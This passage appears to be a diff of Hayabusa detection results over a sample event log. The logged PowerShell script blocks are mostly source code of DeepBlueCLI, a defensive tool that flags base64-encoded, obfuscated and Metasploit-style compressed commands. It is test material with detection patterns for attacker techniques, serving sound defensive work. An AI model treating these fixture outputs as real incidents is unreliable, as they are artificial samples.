7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:37.545 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:37.547 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:23:59.512 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:23:59.512 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:23:59.513 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:23:59.514 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:24:04.587 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:25:39.074 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:25:40.257 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:25:40.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:25:40.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if 